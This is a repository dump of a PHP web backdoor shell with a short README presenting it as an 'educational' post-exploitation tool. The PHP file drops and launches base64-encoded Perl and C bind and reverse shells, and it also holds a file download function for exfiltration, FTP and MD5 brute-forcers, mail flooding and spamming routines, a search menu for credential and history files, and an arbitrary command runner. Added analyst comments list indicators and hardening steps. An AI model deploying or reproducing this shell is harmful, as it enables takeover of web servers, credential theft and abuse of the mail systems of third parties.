├── README.md
└── bheh_shell.php
/README.md:
--------------------------------------------------------------------------------
1 | # bheh_php_shell
2 | Black Hat Ethical Hacking | PHP Backdoor Shell v1.0
3 |
4 | For Educational Purpose Only!
5 |
6 | By SaintDruG // for Black Hat | Ethical Hacking // www.blackhatethicalhacking.com
7 |
8 | A Custom PHP Web Shell, used for penetration testing.
9 |
10 | Purpose: Once you have gained access to a website and are able to upload files, uploading and running this file gives you a set of tools and capabilities to take over and escalate quickly during post-exploitation.
11 |
12 | # Screenshot:
13 | 
14 |
15 | # Black Hat Ethical Hacking
16 |
17 | 
18 |
--------------------------------------------------------------------------------
/bheh_shell.php:
--------------------------------------------------------------------------------
1 | alert('Your shell script was succefully deleted!')";
25 | }
26 |
27 |
/**
 * md5_brute(): dictionary lookup against a single MD5 hash (web-shell tooling).
 *
 * Analyst notes (defensive reading of the listing):
 *  - Reached from shell() when $_POST['type'] is 14; the hash, log path and
 *    dictionary path are all request-supplied.
 *  - Each candidate line is hashed with md5() and compared to $hash with ==;
 *    progress and result text are written to the log path.
 *  - On a match the function calls exit, ending the whole request.
 *  - Host-side artifacts visible here: a log file containing
 *    "passwords was bruted..." / "passwords are failed!" at a path chosen by
 *    the requester, and a PHP worker that outlives its HTTP request.
 *  - NOTE(review): this describes the apparent intent; the listing is not
 *    verified to run as shown.
 *
 * @param string $hash MD5 hex digest to look up
 * @param string $log  path of the progress/result log file
 * @param string $dict path of the candidate-password file
 * @return string|null a "Fill ... field!" message when a validation branch is
 *                     taken; otherwise no explicit return value
 */
28 | function md5_brute($hash,$log,$dict)
29 | {
30 | ignore_user_abort(1); // keep running after the HTTP client disconnects
31 | set_time_limit(0); // remove PHP's execution time limit for this request
32 |
33 | $fl = fopen($dict, "r");
34 | $fl = fopen($log, "w");
35 | $count = 0;
36 | if(!$dict){
37 | return "Fill 'dictionary_file' field!";
38 | }if(!$log){
39 | return "Fill 'log_file' field!";
40 | }elseif(!strlen($hash) == 0){
41 | return "Fill 'md5_hash' field!";
42 | }else{
43 | while(!$feof($dict)){
44 | $pass = fgets($dict);
45 | $brute_hash = md5($pass);
46 | if($brute_hash == $hash){
47 | fputs($log, "$hash:$pass\n---");
48 | fclose($dict);
49 | fclose($log);
50 | exit;
51 | }else{
52 | $count = $count + 1;
53 | fputs($log, "$count passwords was bruted...");
54 | }
55 | }
56 | fputs($log, "$count passwords are failed!");
57 | }
58 | fclose($dict);
59 | fclose($log);
60 | }
61 |
/**
 * port_bind(): drops and launches a TCP listener that hands out a shell
 * (web-shell tooling).
 *
 * Analyst notes (defensive reading of the listing):
 *  - $perl and $c are base64 text. Decoding them suggests a Perl script and a
 *    C program that listen on the given port and attach an interactive
 *    /bin/bash to the accepted connection; the C variant prompts with
 *    "Password:" and contains the string "welcome to r57 shell", which points
 *    at r57-shell lineage. Treat the decoded details as an analyst reading to
 *    be confirmed in a sandbox.
 *  - The decoded source is written to /tmp/shlbck (Perl) or /tmp/shlbck.c (C),
 *    started in the background through ex(), and the file is unlinked right
 *    after launch.
 *  - The method label 'C#' selects the gcc/C branch.
 *  - $port and $pass are concatenated into the command line without escaping.
 *  - Indicators visible on this page: /tmp/shlbck, /tmp/shlbck.c, the command
 *    lines "gcc shlbck.c -o shlbck" and "ps -aux | grep shlbck" run by the web
 *    server account, and a process whose backing file has been deleted.
 *
 * @param string $port   TCP port passed to the dropped program
 * @param string $pass   password argument passed to the C variant
 * @param string $method 'Perl' or 'C#'
 * @return mixed output of ex('ps -aux | grep shlbck'), or 'Choose method'
 */
62 | function port_bind($port,$pass,$method)
63 | {
64 | $perl = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
65 | VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
66 | JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
67 | TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
68 | lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
69 | Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
70 | Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
71 | lIENPTk47DQpleGl0IDA7DQp9DQp9";
72 | $c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
73 | A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
74 | GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
75 | b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
76 | pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
77 | NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
78 | ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
79 | ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
80 | 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
81 | 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
82 | 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
83 | dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
84 | lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
85 |
86 | if($method=='Perl')
87 | {
88 | fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl));
89 | fclose($i);
90 | ex(which("perl")." /tmp/shlbck ".$port." &");
91 | unlink("/tmp/shlbck"); // file removed right after launch; the process keeps running
92 | return ex('ps -aux | grep shlbck');
93 | }
94 | elseif($method=='C#')
95 | {
96 | fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c));
97 | fclose($i);
98 | ex("gcc shlbck.c -o shlbck");
99 | unlink('shlbck.c');
100 | ex("/tmp/shlbck ".$port." ".$pass." &");
101 | unlink("/tmp/shlbck");
102 | return ex('ps -aux | grep shlbck');
103 | }else
104 | {
105 | return 'Choose method';
106 | }
107 |
108 | }
109 |
/**
 * backconnect(): drops and launches a program that connects outbound and
 * attaches a shell to that connection (web-shell tooling).
 *
 * Analyst notes (defensive reading of the listing):
 *  - $perl and $c are base64 text. Decoding them suggests a Perl script that
 *    sets its process name to "lynx" before connecting and running /bin/sh,
 *    and a C program that daemonizes, removes its own binary with "rm -f" and
 *    then runs /bin/sh over the socket. Treat the decoded details as an
 *    analyst reading to be confirmed in a sandbox.
 *  - The decoded source is written to /tmp/shlbck (Perl) or /tmp/shlbck.c (C),
 *    started in the background through ex(), then unlinked.
 *  - The method label 'C#' selects the gcc/C branch.
 *  - $ip and $port are concatenated into the command line without escaping.
 *  - Indicators visible on this page: /tmp/shlbck, /tmp/shlbck.c,
 *    "gcc shlbck.c -o shlbck" and "netstat -an | grep -i listen" run by the
 *    web server account, plus an outbound TCP connection opened by a child of
 *    the web server. Egress filtering for the web tier limits this path.
 *
 * @param string $ip     destination address passed to the dropped program
 * @param string $port   destination port passed to the dropped program
 * @param string $method 'Perl' or 'C#'
 * @return mixed output of ex('netstat -an | grep -i listen'), or 'Choose method'
 */
110 | function backconnect($ip,$port,$method)
111 | {
112 | $perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
113 | aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
114 | hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
115 | sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
116 | kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
117 | KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
118 | OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
119 |
120 | $c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
121 | BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
122 | SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
123 | KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
124 | sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
125 | Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
126 | QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
127 | Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
128 |
129 | if($method=='Perl')
130 | {
131 | fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl));
132 | fclose($i);
133 | ex(which("perl")." /tmp/shlbck ".$ip." ".$port." &");
134 | unlink("/tmp/shlbck"); // file removed right after launch; the process keeps running
135 | return ex('netstat -an | grep -i listen');
136 | }
137 | elseif($method=='C#')
138 | {
139 | fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c));
140 | fclose($i);
141 | ex("gcc shlbck.c -o shlbck");
142 | unlink('shlbck.c');
143 | ex("/tmp/shlbck ".$ip." ".$port." &");
144 | unlink("/tmp/shlbck");
145 | return ex('netstat -an | grep -i listen');
146 | }else
147 | {
148 | return 'Choose method';
149 | }
150 | }
151 |
// Top-level dispatch, evaluated on every request: POST type 11 passes the
// request-supplied path straight to download(). No authentication check is
// visible in the part of the file shown in this listing.
152 | if($_POST['type']==11){download(stripslashes($_POST['value']));};
153 |
/**
 * download(): reads a file from the server and streams it back as an
 * attachment (web-shell file exfiltration helper).
 *
 * Analyst notes (defensive reading of the listing):
 *  - The path comes from the request (POST type 11) and is opened as given;
 *    only basename() of it is used for the attachment file name.
 *  - The whole file is read into memory with fread() before being echoed.
 *  - In access logs this shows up as a POST to the shell file whose response
 *    carries a Content-disposition: attachment header.
 *
 * @param string $dfilename path of the file to send
 * @return void
 */
154 | function download($dfilename)
155 | {
156 | $file=fopen($dfilename,"r");
157 | ob_clean(); // discard anything already buffered so only the file is sent
158 | $filename = basename($dfilename);
159 | $filedump = fread($file,@filesize($dfilename));
160 | fclose($file);
161 | header("Content-type: ".$mime_type);
162 | header("Content-disposition: attachment; filename=\"".$filename."\";");
163 | echo $filedump;
164 | }
165 |
/**
 * flooder(): sends the same message to one recipient $amount times through
 * PHP's mail() (web-shell mail-abuse helper).
 *
 * Analyst notes (defensive reading of the listing):
 *  - Reached from shell() when $_POST['type'] is 10; every argument is
 *    request-supplied.
 *  - The log file is reopened in "w" mode on each iteration, so it only ever
 *    holds the latest counter line.
 *  - When $check is non-empty, one extra message with subject 'Check' is sent
 *    to that address on completion.
 *  - Indicators visible here: a burst of identical outbound mail from the web
 *    server's mail path and a log file containing "flood-letters was sended".
 *    Rate limiting or disabling mail() for the web tier limits this.
 *
 * @param string $logf    log file path
 * @param string $to      recipient address
 * @param string $from    value placed in the From: header
 * @param string $subject message subject
 * @param string $msg     message body
 * @param string $amount  number of messages to send
 * @param string $check   optional address that receives a completion notice
 * @return string|null a "Fill ... field!" message when a validation branch is
 *                     taken; otherwise no explicit return value
 */
166 | function flooder($logf,$to,$from,$subject,$msg,$amount,$check)
167 | {
168 | ignore_user_abort(1); // keep running after the HTTP client disconnects
169 | set_time_limit(0); // remove PHP's execution time limit for this request
170 |
171 | $fl = fopen($logf, "w");
172 | $count = 0;
173 | if(!$logf){
174 | return "Fill 'log_file' field!";
175 | }elseif(!$to){
176 | return "Fill 'Send to' field!";
177 | }elseif(!$from){
178 | return "Fill 'From' field!";
179 | }elseif(!$subject){
180 | return "Fill 'Subject' field!";
181 | }elseif(!$msg){
182 | return "Fill 'Message' field!";
183 | }elseif(!$amount){
184 | return "Fill 'Amount' field!";
185 | }else{
186 | while($count < $amount){
187 | mail("$to", "$subject", "$msg", "From: $from");
188 | $count = $count + 1;
189 | $fl = fopen($logf, "w");
190 | fputs($fl, "$count flood-letters was sended...");
191 | fclose($fl);
192 | }
193 | if(strlen($check) != 0){
194 | $check_text = "Done! $count flood-letters was sended!";
195 | $check_sub = 'Check';
196 | mail("$check", "$check_sub", "$check_text", "From: $from");
197 | $fl = fopen($logf, "w");
198 | fputs($fl, "Done! $count flood-letters was sended!");
199 | }
200 | else{
201 | $fl = fopen($logf, "w");
202 | fputs($fl, "Done! $count flood-letters was sended!");
203 | }
204 | }
205 | fclose($fl);
206 | }
207 |
/**
 * ftp_brute(): tries user/password combinations from two files against an FTP
 * host (web-shell credential-guessing helper).
 *
 * Analyst notes (defensive reading of the listing):
 *  - Reached from shell() when $_POST['type'] is 9; host and all file paths
 *    are request-supplied.
 *  - A new ftp_connect() is made for every attempt, followed by ftp_login().
 *  - Results are appended to the log path ("a+"); a failed connection writes
 *    "Enable connect to <host>" and ends the request with exit.
 *  - Indicators visible here: many short FTP sessions with failed logins
 *    originating from the web server, and a log file ending in "Done:".
 *    Lockout and rate limiting on the FTP service blunt this.
 *  - NOTE(review): this describes the apparent intent; the listing is not
 *    verified to run as shown.
 *
 * @param string $host       FTP host to connect to
 * @param string $ftp_users  path of the user-name list
 * @param string $ftp_passwd path of the password list
 * @param string $ftp_log    path of the result log
 * @return string|null a validation message when one of the checks fails;
 *                     otherwise no explicit return value
 */
208 | function ftp_brute($host,$ftp_users,$ftp_passwd,$ftp_log)
209 | {
210 | ignore_user_abort(1); // keep running after the HTTP client disconnects
211 | set_time_limit(0); // remove PHP's execution time limit for this request
212 |
213 | $fl = fopen($ftp_users, "r");
214 | $fd = fopen($ftp_passwd, "r");
215 | $fr = fopen($ftp_log, "a+");
216 | if(!$host){
217 | return "Fill 'Host' field!";
218 | }elseif(!$ftp_users){
219 | return "Fill 'ftp_users file' field!";
220 | }elseif(!$ftp_passwd){
221 | return "Fill 'ftp_passwd file' field!";
222 | }elseif(!$ftp_log){
223 | return "Fill 'ftp_log file' field!";
224 | }elseif(!file_exists($ftp_users)){
225 | return "File ".$ftp_users." doesn't exists!";
226 | }elseif(!file_exists($ftp_passwd)){
227 | return "File ".$ftp_passwd." doesn't exists!";
228 | }
229 | else{
230 | while(!feof($fd)){
231 | $pass = fgets($fd);
232 | while(!feof($fl)){
233 | $user = fgets($fl);
234 | $connect = ftp_connect($host);
235 | if(!$connect){
236 | fputs($fr, "Enable connect to $host\n");
237 | exit;
238 | }else{
239 | $auth = ftp_login($connect, $user, $pass);
240 | if(!$auth){
241 | ftp_quit($connect);
242 | }
243 | else{
244 | fputs($fr, "$host:\n---$login:$pass\n---");
245 | ftp_quit($connect);
246 | }
247 | }
248 | }
249 | }
250 | fputs($fr, "Done:\n");
251 | fclose($fr);
252 | }
253 | fclose($fl);
254 | fclose($fd);
255 | }
256 |
/**
 * spammer(): sends one message to every address in a list file through PHP's
 * mail() (web-shell mail-abuse helper).
 *
 * Analyst notes (defensive reading of the listing):
 *  - Reached from shell() when $_POST['type'] is 8; every argument is
 *    request-supplied.
 *  - The log file is reopened in "w" mode on each iteration, so it only ever
 *    holds the latest counter line.
 *  - When $check is non-empty, one extra message with subject 'Check' is sent
 *    to that address on completion.
 *  - Indicators visible here: bulk outbound mail from the web server's mail
 *    path and a log file containing "letters was sent".
 *  - NOTE(review): this describes the apparent intent; the listing is not
 *    verified to run as shown.
 *
 * @param string $from    value placed in the From: header
 * @param string $subject message subject
 * @param string $msg     message body
 * @param string $check   optional address that receives a completion notice
 * @param string $elist   path of the recipient list file
 * @param string $logf    log file path
 * @return string|null a validation message when one of the checks fails;
 *                     otherwise no explicit return value
 */
257 | function spammer($from,$subject,$msg,$check,$elist,$logf)
258 | {
259 | ignore_user_abort(1); // keep running after the HTTP client disconnects
260 | set_time_limit(0); // remove PHP's execution time limit for this request
261 |
262 | $fp = fopen($elist. "r");
263 | $fl = fopen($logf, "w");
264 | $count = 0;
265 | if(!$from){
266 | return "Fill 'From' field!";
267 | }elseif(!$elist){
268 | return "Fill 'Emails list' field!";
269 | }elseif(!$logf){
270 | return "Fill 'Log File' field!";
271 | }elseif(!$msg){
272 | return "Fill 'Message' field!";
273 | }elseif(!$subject){
274 | return "Fill 'Subject' field!";
275 | }elseif(!file_exists($elist)){
276 | return "File ".$elist." doesn't exists!";
277 | }else{
278 | while(!feof($fp)){
279 | $to = fgets($fp);
280 | mail("$to", "$subject", "$msg", "From: $from");
281 | $count = $count + 1;
282 | $fl = fopen($logf, "w");
283 | fputs($fl, "$count letters was sent...");
284 | fclose($fl);
285 | }
286 | if(strlen($check) != 0){
287 | $check_text = "Done! $count letters was sent!";
288 | $check_sub = 'Check';
289 | mail("$check", "$check_sub", "$check_text", "From: $from");
290 | $fl = fopen($logf, "w");
291 | fputs($fl, "Done! $count letters was sent!\n");
292 | }
293 | else{
294 | $fl = fopen($logf, "w");
295 | fputs($fl, "Done! $count letters was sent!");
296 | }
297 | }
298 | fclose($fp);
299 | fclose($fl);
300 | }
301 |
/**
 * alias(): maps a fixed menu label to a canned shell command and returns its
 * output via ex() (web-shell host-reconnaissance menu).
 *
 * Analyst notes (defensive reading of the listing):
 *  - Reached from shell() when $_POST['type'] is 7; $in is compared with ==
 *    against literal labels, so only the commands listed here can be run
 *    through this path.
 *  - The commands search for web/PHP configuration files, access and error
 *    logs, SUID/SGID binaries, world-writable files and directories, stored
 *    credentials (service.pwd, .htpasswd, .fetchmailrc) and shell/MySQL
 *    history files, and list listening ports.
 *  - Indicators visible here: filesystem-wide "find / ..." invocations,
 *    "lsattr -va" and "netstat -an | grep -i listen" spawned by the web
 *    server account.
 *  - No branch matches an unknown label, so the function then returns nothing.
 *
 * @param string $in menu label selecting the command
 * @return mixed output of ex() for the matched label
 */
302 | function alias($in)
303 | {
304 | if($in=="find apahce config file"){return ex('find / -type f -name httpd.conf');}
305 | elseif($in=="find access_log files"){return ex('find / -type f -name access_log');}
306 | elseif($in=="find error_log files"){return ex('find / -type f -name error_log');}
307 | elseif($in=="find suid files"){return ex('find / -type f -perm -04000 -ls');}
308 | elseif($in=="find suid files in current dir"){return ex('find . -type f -perm -04000 -ls');}
309 | elseif($in=="find sgid files"){return ex('find / -type f -perm -02000 -ls');}
310 | elseif($in=="find sgid files in current dir"){return ex('find . -type f -perm -02000 -ls');}
311 | elseif($in=="find config.inc.php files"){return ex('find / -type f -name config.inc.php');}
312 | elseif($in=="find config.inc.php files in current dir"){return ex('find . -type f -name config.inc.php');}
313 | elseif($in=="find config* files"){return ex('find / -type f -name "config*"');}
314 | elseif($in=="find config* files in current dir"){return ex('find . -type f -name "config*"');}
315 | elseif($in=="find all writable files"){return ex('find / -type f -perm -2 -ls');}
316 | elseif($in=="find all writable files in current dir"){return ex('find . -type f -perm -2 -ls');}
317 | elseif($in=="find all writable directories"){return ex('find / -type d -perm -2 -ls');}
318 | elseif($in=="find all writable directories in current dir"){return ex('find . -type d -perm -2 -ls');}
319 | elseif($in=="find all writable directories and files"){return ex('find / -perm -2 -ls');}
320 | elseif($in=="find all writable directories and files in current dir"){return ex('find . -perm -2 -ls');}
321 | elseif($in=="find all service.pwd files"){return ex('find / -type f -name service.pwd');}
322 | elseif($in=="find service.pwd files in current dir"){return ex('find . -type f -name service.pwd');}
323 | elseif($in=="find all .htpasswd files"){return ex('find / -type f -name .htpasswd');}
324 | elseif($in=="find .htpasswd files in current dir"){return ex('find . -type f -name .htpasswd');}
325 | elseif($in=="find all .bash_history files"){return ex('find / -type f -name .bash_history');}
326 | elseif($in=="find .bash_history files in current dir"){return ex('find . -type f -name .bash_history');}
327 | elseif($in=="find all .mysql_history files"){return ex('find / -type f -name .mysql_history');}
328 | elseif($in=="find .mysql_history files in current dir"){return ex('find . -type f -name .mysql_history');}
329 | elseif($in=="find all .fetchmailrc files"){return ex('find / -type f -name .fetchmailrc');}
330 | elseif($in=="find .fetchmailrc files in current dir"){return ex('find . -type f -name .fetchmailrc');}
331 | elseif($in=="list file attributes on a Linux second extended file system"){return ex('lsattr -va');}
332 | elseif($in=="show opened ports"){return ex('netstat -an | grep -i listen');}
333 | elseif($in=="---------------------------------------------------------------------------------------------------------"){return ex('ls -la');}
334 | }
335 |
/**
 * testperl(): capability probe. Runs "perl -h" through ex() and reports "ON"
 * when any output comes back, "OFF" otherwise. The command line itself is a
 * small indicator when spawned by the web server account.
 *
 * @return string "ON" or "OFF"
 */
336 | function testperl()
337 | {
338 | if(ex('perl -h'))
339 | {
340 | return "ON";
341 | }else{
342 | return "OFF";
343 | }
344 | }
345 |
/**
 * testlynx(): capability probe. Runs "lynx --help" through ex() and reports
 * "ON" when any output comes back, "OFF" otherwise.
 *
 * @return string "ON" or "OFF"
 */
346 | function testlynx()
347 | {
348 | if(ex('lynx --help'))
349 | {
350 | return "ON";
351 | }else{
352 | return "OFF";
353 | }
354 | }
355 |
356 |
/**
 * view_size(): formats a byte count for display.
 *
 * Values of 1024 bytes or more are divided by the matching power of 1024 and
 * rounded to two decimals with a " KB", " MB" or " GB" suffix; smaller values
 * get " B" appended unchanged.
 *
 * @param int|float $size byte count
 * @return string formatted size with unit suffix
 */
357 | function view_size($size)
358 | {
359 | if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
360 | elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
361 | elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
362 | else {$size = $size . " B";}
363 | return $size;
364 | }
365 |
/**
 * testfetch(): capability probe. Runs "fetch --help" through ex() and reports
 * "ON" when any output comes back, "OFF" otherwise.
 *
 * @return string "ON" or "OFF"
 */
366 | function testfetch()
367 | {
368 | if(ex('fetch --help'))
369 | {
370 | return "ON";
371 | }else{
372 | return "OFF";
373 | }
374 | }
375 |
/**
 * testwget(): capability probe. Runs "wget --help" through ex() and reports
 * "ON" when any output comes back, "OFF" otherwise.
 *
 * @return string "ON" or "OFF"
 */
376 | function testwget()
377 | {
378 | if(ex('wget --help'))
379 | {
380 | return "ON";
381 | }else{
382 | return "OFF";
383 | }
384 | }
385 |
/**
 * oracle(): capability probe. Reports "ON" when the PHP function ocilogon
 * exists in this runtime, "OFF" otherwise; no connection is attempted.
 *
 * @return string "ON" or "OFF"
 */
386 | function oracle()
387 | {
388 | if(function_exists('ocilogon'))
389 | {
390 | return "ON";
391 | }else{
392 | return "OFF";
393 | }
394 | }
395 |
/**
 * postgresql(): capability probe. Reports "ON" when the PHP function
 * pg_connect exists in this runtime, "OFF" otherwise; no connection is
 * attempted.
 *
 * @return string "ON" or "OFF"
 */
396 | function postgresql()
397 | {
398 | if(function_exists('pg_connect'))
399 | {
400 | return "ON";
401 | }else{
402 | return "OFF";
403 | }
404 | }
405 |
/**
 * testmssql(): capability probe. Reports "ON" when the PHP function
 * mssql_connect exists in this runtime, "OFF" otherwise; no connection is
 * attempted.
 *
 * @return string "ON" or "OFF"
 */
406 | function testmssql()
407 | {
408 | if(function_exists('mssql_connect'))
409 | {
410 | return "ON";
411 | }else{
412 | return "OFF";
413 | }
414 | }
/**
 * testcurl(): capability probe. Reports "ON" when the PHP function
 * curl_version exists in this runtime, "OFF" otherwise.
 *
 * @return string "ON" or "OFF"
 */
415 | function testcurl()
416 | {
417 | if(function_exists('curl_version'))
418 | {
419 | return "ON";
420 | }else{
421 | return "OFF";
422 | }
423 | }
/**
 * testmysql(): capability probe. Reports "ON" when the PHP function
 * mysql_connect exists in this runtime, "OFF" otherwise; no connection is
 * attempted.
 *
 * @return string "ON" or "OFF"
 */
424 | function testmysql()
425 | {
426 | if(function_exists('mysql_connect'))
427 | {
428 | return "ON";
429 | }else{
430 | return "OFF";
431 | }
432 | }
/**
 * safe_mode(): probes whether shell command execution works and records the
 * result in the session.
 *
 * Analyst notes (defensive reading of the listing):
 *  - Runs "echo abch0ld" through ex() and checks whether "h0ld" is found at
 *    offset 3 of the output; when it is not, the function reports "ON" and
 *    sets $_SESSION['safe_mode'] to 1, otherwise "OFF" and 0.
 *  - shell() reads $_SESSION['safe_mode'] to choose between ex() and the
 *    PHP-only directory listing in safe_ex().
 *  - The literal command "echo abch0ld" is a usable process-audit indicator.
 *
 * @return string "ON" or "OFF"
 */
433 | function safe_mode()
434 | {
435 | if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3)
436 | {
437 | $_SESSION['safe_mode'] = 1;
438 | return "ON";
439 | }else{
440 | $_SESSION['safe_mode'] = 0;
441 | return "OFF";
442 | }
443 | };
444 |
/**
 * ex(): command-execution wrapper used by the rest of the shell.
 *
 * Analyst notes (defensive reading of the listing):
 *  - Tries exec, passthru, system and shell_exec in that order, using the
 *    first one for which function_exists() is true, and falls back to popen().
 *  - $in is passed to the operating-system shell unchanged; callers build it
 *    from request values.
 *  - Hardening: listing all five functions in php.ini's disable_functions and
 *    preventing PHP execution in upload directories removes this primitive.
 *    Process auditing will show sh/bash children of the web server account.
 *
 * @param string $in command line to run
 * @return mixed captured command output; '' when no branch produced output
 */
445 | function ex($in)
446 | {
447 | $out = '';
448 |
449 |
450 | if(function_exists('exec'))
451 | {
452 | exec($in,$out);
453 | $out = join("\n",$out); // exec() fills $out with an array of output lines
454 | }
455 | elseif(function_exists('passthru'))
456 | {
457 | ob_start(); // passthru() writes straight to output, so capture it in a buffer
458 | passthru($in);
